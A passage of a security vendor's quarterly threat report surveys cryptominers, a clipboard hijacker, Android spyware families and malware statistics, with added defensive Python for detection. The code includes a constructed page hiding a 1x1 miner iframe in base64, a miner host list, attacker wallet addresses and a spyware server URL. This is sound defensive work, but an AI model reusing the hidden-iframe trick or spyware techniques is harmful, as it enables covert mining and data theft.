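SUSPECT_HOSTS = ("cnhv.co", "coinhive.com")

# Runs of base64 alphabet long enough to hide a tag; short runs are ignored.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def extract_iframes(html):
    parser = IframeCollector()
    parser.feed(html)
    return parser.iframes


def decode_embedded_base64(html):
    """Decode every base64-looking run that yields printable text (the layer the
    report reaches with 'if we decode the string')."""
    layers = []
    for m in B64_RE.finditer(html):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue          # binary or not really base64; not markup
        if text.isprintable():
            layers.append(text)
    return layers


def _tiny(value):
    """True when a width/height attribute is 1 pixel or less."""
    try:
        return int(value) <= 1
    except (TypeError, ValueError):
        return False


def find_hidden_miner_iframes(html):
    """Report iframes that are invisible by size or point at a known miner host,
    looking at the visible markup and inside decoded base64 strings."""
    findings = []
    for layer in [html] + decode_embedded_base64(html):
        for attrs in extract_iframes(layer):
            src = attrs.get("src") or ""
            hidden = _tiny(attrs.get("width")) and _tiny(attrs.get("height"))
            known_host = any(h in src for h in SUSPECT_HOSTS)
            if hidden or known_host:
                findings.append({"src": src, "hidden": hidden, "known_miner_host": known_host})
    return findings


# Constructed sample page (not from the report): a normal-sized iframe plus a
# 1x1 iframe to the shortener, hidden inside a base64 string written via atob().
_HIDDEN = '<iframe src="https://cnhv.co/EXAMPLE-KEY" width="1" height="1"></iframe>'
SAMPLE_HTML = (
    "<html><body><h1>News</h1>"
    '<iframe src="https://example.org/widget" width="300" height="200"></iframe>'
    '<script>document.write(atob("' + base64.b64encode(_HIDDEN.encode()).decode() + '"));</script>'
    "</body></html>"
)
```

Size and host are deliberately separate signals: a 1x1 iframe to an unknown host still deserves a look, and a full-size iframe to a known miner host is caught even when the page does not bother to hide it.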
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and numbers, so it is almost impossible to remember it or fill it in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste process as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added the malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack:
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
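Validating the address itself does not help against this hijacker, because the attacker's replacement address is just as well-formed as the victim's. What is detectable is the swap: one wallet address replaced by a different one by a process that is not the one the user is working in. The Python below is an added example, not code from the report or from Comodo. It models clipboard updates as a monitoring agent would record them (a sequence number, the process that set the content, the foreground process, and the text); the event list is constructed, the process names are invented, and the two Bitcoin addresses are the ones quoted in the report's example.

```python
import re
from dataclasses import dataclass

# Address shapes only (Bitcoin legacy/P2SH Base58, Ethereum hex). Checksums are
# deliberately not verified: a hijacker's replacement address is also valid, so
# the signal is the swap itself, not the address.
WALLET_RE = re.compile(r"^(?:[13][1-9A-HJ-NP-Za-km-z]{25,34}|0x[0-9a-fA-F]{40})$")


@dataclass
class ClipboardEvent:
    """One clipboard update as a monitoring agent would record it (constructed
    model; on Windows the sequence number would come from
    GetClipboardSequenceNumber and the owner from GetClipboardOwner)."""
    seq: int
    owner: str        # process that set the clipboard content
    foreground: str   # process that had the foreground window at that moment
    text: str


def looks_like_wallet(text):
    return bool(WALLET_RE.match(text.strip()))


def detect_clipboard_swaps(events):
    """Alert when a wallet address is replaced by a different wallet address and
    the replacing process is not the foreground one. A user copying a second
    address in the application they are using is not flagged."""
    alerts = []
    prev = None
    for ev in sorted(events, key=lambda e: e.seq):
        if prev is not None and looks_like_wallet(prev.text) and looks_like_wallet(ev.text):
            if ev.text != prev.text and ev.owner != ev.foreground:
                alerts.append({"seq": ev.seq, "process": ev.owner,
                               "original": prev.text, "replacement": ev.text})
        prev = ev
    return alerts


# Constructed sequence reproducing the report's example: the user copies one
# address in the browser and a background process overwrites it with another.
# The final event is a legitimate second copy made in the foreground wallet app.
SAMPLE_EVENTS = [
    ClipboardEvent(1, "browser.exe", "browser.exe", "meeting at 10"),
    ClipboardEvent(2, "browser.exe", "browser.exe", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ClipboardEvent(3, "allradio.exe", "browser.exe", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
    ClipboardEvent(4, "wallet.exe", "wallet.exe", "0x52908400098527886E0F7030069857D2E4169EE7"),
]


if __name__ == "__main__":
    for alert in detect_clipboard_swaps(SAMPLE_EVENTS):
        print(alert)
```

The same rule could run inside a wallet application at paste time, by comparing the pasted address with the one the user last copied; the owner check is what keeps a genuine re-copy from raising a false alarm.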
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible and constantly change disguises to avoid detection, honing their tradecraft from version to version.
4.1.1 KevDroid
The first is named KevDroid. It's distributed in three versions:
Version-1: Naver Defender
Version-2: Netease Defender
Version-3: PU
Disguises of KevDroid
The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details and contacts (ID, name, phone numbers and email address of the owner). It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.
The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.
Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and device information.
People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment, the spyware constantly kept track of all events on the infected device. Another means of the malware's dissemination was social networks.
Version-1: Dardesh Google Play Services Instant Apps
Version-2: Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim's device.
4.1.2 Zoo Park
The next member of the spy family, Zoo Park, has 4 different versions:
Version-1: Telegram Groups انتخاب دھم
Version-2: Postrall Yes For Referendum انتخاب دھم
Version-3: Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4: VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app. It extracts Accounts and Contacts details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.
The third version is included in spyware named "Spymaster Pro" and can:
Enable and disable the GPS services
Record audio and send it to the Command & Control server
Upload image files
Collect information about the applications installed
Collect browser's data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc.
In addition to the abilities of previous versions, it includes some additional tricks:
Extracts photos, audio and video
Records the screen
Executes shell commands
Records calls
4.1.3 MikeSpy
Some spyware examples specifically hunt for messengers' data, like the next digital spook, MikeSpy.
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application. But instead of a girlfriend, it has a bundle of malicious abilities:
Takes control of the Bluetooth adapter
Extracts data about accounts, contact details and installed apps
Extracts data from the WhatsApp message DB and related keys
Uploads collected data to the cybercriminals' server via FTP
4.1.4 Xloader
The next spyware, Xloader, combines spying with purposeful hunting for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.
Version-1 to Version-3: Facebook, Chrome
Disguises of Xloader
After infection, Xloader connects to its C&C server and executes the following commands:
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the presence of the following banking applications: comwooribankpibsmart, comkbstarkbbank, comibkneobanking, comscdanbscbankapp, comshinhansbanking, comhanabankebkchannelandroidhananbank, nhsmart, comepostpsfsdsi, comkftckjbsmb, comsmgspbs
Extract contact details
Set Wi-Fi to always on
Version 2 can execute additional commands:
Send SMS and read outgoing SMS
Enable and disable the Wi-Fi connection
Access a location specified by the attackers
Make recordings
Make calls
4.1.5 Stalker Spy
The next malware in the row is Stalker Spy. As you can see, it's a champion in the number of masks it puts on to deceive users.
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to the usual must-have spyware set, Xloader can turn on the microphone remotely on the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage. After encryption, the malware deletes the original files. So we can call it a spy with a "007 license".
Version 1: Adobe Flash Player
Version 2: Flash Player
Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some commands that the malware can execute on your device:
Send_SMS - extract SMS content and send it to the C&C server
Send_USSD - send the USSD to the C&C server
Gethistory - monitor browser history
Start_AllApp - gather info about installed applications
Send_call - set the Intent action to call
Forward_call - forward incoming calls
ResForward_call - reset the forwarded calls
Go_Smsmnd - delete SMS content
Go_GetAlls - get SMS history
Dell_sms - delete SMS content in a conversation
Send_spam - send spam SMS
Start_Inject - call the injectors class
4.1.7 FakeSpy
FakeSpy also has many masks, which you can see in the screenshot:
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp.
Here are some commands from its Command and Control server:
contacts - Get contact details and email ID
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader Update Flash Player Android Update WhatsApp Viber
Version 2: Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1:
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel. Noticeably, it's sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio recordings, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay
The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1:
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive
And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1: Netflix Hack, Instagram Hack
Version-2: TSF Launcher
Version-3: Android Service, PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is it possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too. Thief robbing thief.
This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files, such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives, such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the No. 1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
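The account-creation-then-elevation behaviour attributed to Starter above leaves a distinctive trace in the Windows Security log, and a defender can correlate it. The following is added example code, not from the report: Event IDs 4720 and 4732 and the Administrators SID are real Windows values, while the hostnames, SIDs, timestamps and the ten-minute window are constructed assumptions.

```python
"""Correlate Windows Security events to flag a local account that is created
(4720) and promptly added to Administrators (4732), the sequence the report
attributes to the Starter trojan. Added example code, not from the report.
Event IDs and the Administrators SID are real; all records are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable

ACCOUNT_CREATED = 4720             # "A user account was created"
LOCAL_GROUP_MEMBER_ADDED = 4732    # "A member was added to a security-enabled local group"
ADMIN_GROUP_SID = "S-1-5-32-544"   # well-known SID of BUILTIN\Administrators
WINDOW = timedelta(minutes=10)     # assumed: creation and elevation must be this close


@dataclass
class Alert:
    host: str
    account: str
    created_by: str
    created_at: datetime
    elevated_at: datetime


def correlate(events: Iterable[dict], window: timedelta = WINDOW) -> list:
    """Return one Alert per account created and then added to Administrators on
    the same host within `window`. Events may arrive in any order, so all 4720s
    are indexed first and the 4732s are matched against them afterwards."""
    created = {}     # (host, new account SID) -> (time, account name, creator)
    elevations = []  # (host, member SID, time)
    for ev in events:
        ts = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == ACCOUNT_CREATED:
            created[(ev["Computer"], ev["TargetSid"])] = (ts, ev["TargetUserName"], ev["SubjectUserName"])
        elif ev["EventID"] == LOCAL_GROUP_MEMBER_ADDED and ev["TargetSid"] == ADMIN_GROUP_SID:
            elevations.append((ev["Computer"], ev["MemberSid"], ts))
    alerts = []
    for host, member_sid, elevated_at in elevations:
        hit = created.get((host, member_sid))
        if hit is None:
            continue  # an existing account was promoted: routine admin work, not this pattern
        created_at, name, creator = hit
        if timedelta(0) <= elevated_at - created_at <= window:
            alerts.append(Alert(host, name, creator, created_at, elevated_at))
    return alerts


# Constructed sample records using the field names the Security log itself uses.
# Hostnames, user names and the S-1-5-21-EXAMPLE SIDs are placeholders.
SAMPLE_EVENTS = [
    # Suspicious: new account, promoted to Administrators two seconds later
    {"EventID": 4720, "TimeCreated": "2018-06-04T09:12:03", "Computer": "WS-07",
     "SubjectUserName": "jdoe", "TargetUserName": "Remote Service Account",
     "TargetSid": "S-1-5-21-EXAMPLE-1105"},
    {"EventID": 4732, "TimeCreated": "2018-06-04T09:12:05", "Computer": "WS-07",
     "SubjectUserName": "jdoe", "TargetUserName": "Administrators",
     "TargetSid": ADMIN_GROUP_SID, "MemberSid": "S-1-5-21-EXAMPLE-1105"},
    # Routine: a long-existing account is added to Administrators (no matching 4720)
    {"EventID": 4732, "TimeCreated": "2018-06-04T10:00:00", "Computer": "WS-07",
     "SubjectUserName": "helpdesk", "TargetUserName": "Administrators",
     "TargetSid": ADMIN_GROUP_SID, "MemberSid": "S-1-5-21-EXAMPLE-1004"},
    # Routine: account created in the morning, promoted hours later (outside the window)
    {"EventID": 4720, "TimeCreated": "2018-06-04T08:00:00", "Computer": "SRV-02",
     "SubjectUserName": "admin", "TargetUserName": "svc_build",
     "TargetSid": "S-1-5-21-EXAMPLE-1200"},
    {"EventID": 4732, "TimeCreated": "2018-06-04T13:30:00", "Computer": "SRV-02",
     "SubjectUserName": "admin", "TargetUserName": "Administrators",
     "TargetSid": ADMIN_GROUP_SID, "MemberSid": "S-1-5-21-EXAMPLE-1200"},
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_EVENTS):
        print(f"{a.host}: '{a.account}' created by {a.created_by} at {a.created_at:%H:%M:%S}, "
              f"added to Administrators at {a.elevated_at:%H:%M:%S}")
```

Only the first pair fires; the helpdesk promotion has no matching creation event and the build account sits outside the window.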
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the No. 1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open-source software that is compatible with numerous file formats and different operating systems, and leverages an open-source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the No. 1 home of malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality, but in fact do the opposite, and include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are No. 2 and No. 3, respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section, let's examine unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the No. 1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected in not only one but multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
